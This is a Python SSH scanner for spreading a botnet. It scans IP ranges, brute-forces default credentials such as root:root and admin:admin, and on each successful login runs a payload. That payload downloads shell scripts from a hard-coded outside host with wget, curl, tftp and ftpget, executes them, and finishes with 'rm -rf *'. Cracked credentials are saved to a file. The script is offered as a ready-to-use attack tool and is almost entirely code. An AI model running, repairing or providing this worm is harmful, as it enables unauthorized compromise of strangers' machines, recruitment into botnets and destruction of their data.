# Voids hacka scanna# nano /usr/include/bits/typesizes.h -> change 1024 to 999

1. # Voids hacka scanna
2. # nano /usr/include/bits/typesizes.h -> change 1024 to 99999
3. # ulimit -n 99999
4. # python scan.py 1000 <start-range> <end-range> <<USAGE
5.  
6. import threading, paramiko, random, socket, time, sys
7.  
8. paramiko.util.log_to_file("/dev/null")
9.  
10. blacklisted = ["127.0","10.0","192.168"]
11.  
12. server_ip = "23.226.69.108"
13.  
14. passwords = ["admin:1234", "root:root", "root:toor", "admin:admin", "hacker:hacker", "botnet:botnet]
15.  
16. if sys.argv[4] == "root":
17.    passwords = ["root:root"]
18. if sys.argv[4] == "guest":
19.    passwords = ["guest:guest"]
20. if sys.argv[4] == "telnet":
21.    passwords = ["telnet:telnet"]
22.  
23. if len(sys.argv) < 4:
24.    sys.exit("Usage: python " + sys.argv[0] + " <threads> <start-range> <end-range> <passwords>")
25.  
26. print """\n\x1b[0;37m******************************
27. *      \x1b[0;31mSCANNER STARTING\x1b[0;37m      *
28. ******************************\x1b[0m"""
29.  
30. def sshscanner(ip):
31.    global passwords
32.    try:
33.        thisipisbad='no'
34.        for badip in blacklisted:
35.            if badip in ip:
36.                thisipisbad='yes'
37.        if thisipisbad=='yes':
38.            sys.exit()
39.        username='root'
40.        password="0"
41.        port = 22
42.        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
43.        s.settimeout(3)
44.        s.connect((ip, port))
45.        data = str(s.recv(1024))
46.        if "SSH" in data:
47.            print("\x1b[0;33m[-] SSH Open On -> " + ip + "\x1b[37m")
48.        elif "ssh" in data:
49.            print("\x1b[0;33m[-] SSH Open On -> " + ip + "\x1b[37m")
50.        else:
51.            sys.exit()
52.        s.close()
53.        ssh = paramiko.SSHClient()
54.        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
55.        dobreak=False
56.        for passwd in passwords:
57.            if ":n/a" in passwd:
58.                password=""
59.            else:
60.                password=passwd.split(":")[1]
61.            if "n/a:" in passwd:
62.                username=""
63.            else:
64.                username=passwd.split(":")[0]
65.            try:
66.                ssh.connect(ip, port = port, username=username, password=password, timeout=3)
67.                break
68.            except:
69.                pass
70.        badserver=True
71.        stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
72.        output = stdout.read()
73.        if "inet addr" in output:
74.            badserver=False
75.        websites = [ ]        
76.        if badserver == False:
77.                print("\x1b[0;32m[+] Executing Payload -> " + ip + ":" + username + ":" + password + "\x1b[37m")
78.                ssh.exec_command("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.94.97.33/bins.sh; curl -O http://23.94.97.33/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 23.94.97.33 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 23.94.97.33; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 23.94.97.33 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *")
79.                vulns = open("vuln.txt", "a").write(username + ":" + password + ":" + ip + "\n")
80.                time.sleep(12)
81.                ssh.close()
82.    except Exception as e:
83.        pass
84.  
85.  
86. if sys.argv[2] == "LUCKY":
87.    ranges = ["122.3.0.0/122.3.255.255", "122.52.0.0/122.54.255.255", "124.83.0.0/124.83.255.255", "124.105.0.0/124.107.255.255"]
88.    randomrange = random.choice(ranges)
89.    startrng = randomrange.split("/")[0]
90.    endrng = randomrange.split("/")[1]
91.  
92. if sys.argv[2] != "LUCKY":
93.    a = int(sys.argv[2].split(".")[0])
94.    b = int(sys.argv[2].split(".")[1])
95.    c = int(sys.argv[2].split(".")[2])
96.    d = int(sys.argv[2].split(".")[3])
97. else:
98.    a = int(startrng.split(".")[0])
99.    b = int(startrng.split(".")[1])
100.    c = int(startrng.split(".")[2])
101.    d = int(startrng.split(".")[3])
102. x = 0
103.  
104. while(True):
105.    try:
106.  
107.        if sys.argv[2] != "LUCKY":
108.            endaddr = sys.argv[3]
109.        else:
110.            endaddr = endrng
111.      
112.        d += 1
113.  
114.        ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
115.  
116.        if endaddr == (ipaddr or str(a) + "." + str(b) + "."+str(c)+"."+str(d-1)):
117.            if sys.argv[2] == "LUCKY":
118.                randomrange = random.choice(ranges)
119.                startrng = randomrange.split("/")[0]
120.                endrng = randomrange.split("/")[1]
121.                a = int(startrng.split(".")[0])
122.                b = int(startrng.split(".")[1])
123.                c = int(startrng.split(".")[2])
124.                d = int(startrng.split(".")[3])
125.            else:
126.                break
127.  
128.        if d > 255:
129.            c += 1
130.            d = 0
131.  
132.        if c > 255:
133.            b += 1
134.            c = 0
135.      
136.        if b > 255:
137.            a += 1
138.            b = 0
139.  
140.        ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
141.  
142.        if ipaddr == endaddr:
143.            if sys.argv[2] == "LUCKY":
144.                randomrange = random.choice(ranges)
145.                startrng = randomrange.split("/")[0]
146.                endrng = randomrange.split("/")[1]
147.                a = int(startrng.split(".")[0])
148.                b = int(startrng.split(".")[1])
149.                c = int(startrng.split(".")[2])
150.                d = int(startrng.split(".")[3])
151.            else:
152.                break
153.  
154.        if x > 500:
155.            time.sleep(1)
156.            x = 0
157.      
158.        t = threading.Thread(target=sshscanner, args=(ipaddr,))
159.        t.start()
160.      
161.    except Exception as e:
162.        pass
163.  
164. print "\x1b[37mDone\x1b[37m"